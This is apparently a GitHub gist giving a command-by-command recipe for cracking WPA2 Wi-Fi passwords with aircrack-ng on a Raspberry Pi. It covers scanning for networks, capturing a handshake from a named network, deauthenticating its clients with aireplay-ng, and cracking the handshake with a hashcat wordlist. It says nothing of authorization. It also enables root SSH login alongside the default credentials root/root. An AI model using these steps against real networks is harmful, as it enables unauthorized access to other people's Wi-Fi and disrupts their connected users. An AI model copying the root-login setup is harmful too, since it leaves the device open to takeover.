Skip to content

Instantly share code, notes, and snippets.

@helloingob
Created January 12, 2019 01:17
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save helloingob/3efc7c4babaea3f921525a74e8f063b2 to your computer and use it in GitHub Desktop.
Save helloingob/3efc7c4babaea3f921525a74e8f063b2 to your computer and use it in GitHub Desktop.
How to use aircrack-ng run by archlinux on a raspberry pi
Based on https://miloserdov.org/?p=659
Hardware:
- TP-Link TL-WN722N + TP-Link TL-ANT2408CL
- Raspberry Pi 3
1.) Get Archlinux für Raspberry
RaspArch Build 181117 (http://raspex.exton.se/?p=983)
Download (https://sourceforge.net/projects/rasparch/files/latest/download)
2.) Flash OS and boot Raspberry
3.) *OPTIONAL* Add remote root login
login via GUI over hdmi -> root/root
3.1) Enable root login over ssh
nano /etc/ssh/sshd_config
PermitRootLogin yes
service sshd restart
4.) Update Archlinux
sudo pacman -Syy
sudo pacman -Su
5.) Install Aircrack-ng
sudo pacman -S aircrack-ng
7.) Do network scan and sort by high #Data
sudo airodump-ng wlan1
CTRL+c
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E0:28:6D:63:18:06 -70 63 21 0 1 54 WPA2 CCMP PSK Box 6490 Cable
8.) Choose BSSID and wait to capture handshake
sudo airodump-ng -c CHANNEL --bssid MAC_ADDRESS -w FILE INTERFACE
sudo airodump-ng -c 1 --bssid E0:28:6D:63:18:06 -w test wlan1
Wait for -> CH 6 ][ Elapsed: 1 min ][ 2019-01-08 19:56 ][ WPA handshake: DC:53:7C:0F:09:3C
or do 9)
9.) *OPTIONAL* Deauthentication
sudo aireplay-ng -0 3 -a MAC_ADDRESS INTERFACE
sudo aireplay-ng -0 3 -a E0:28:6D:63:18:06 wlan1
10.) Convert capture handshake file to hccapx
https://hashcat.net/cap2hccapx/
11.) Run Hashcat
https://miloserdov.org/?p=953
hashcat64.exe -m 2500 -a 0 -w 3 -o "found.txt" C:\test.hccapx C:\wordlist\
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment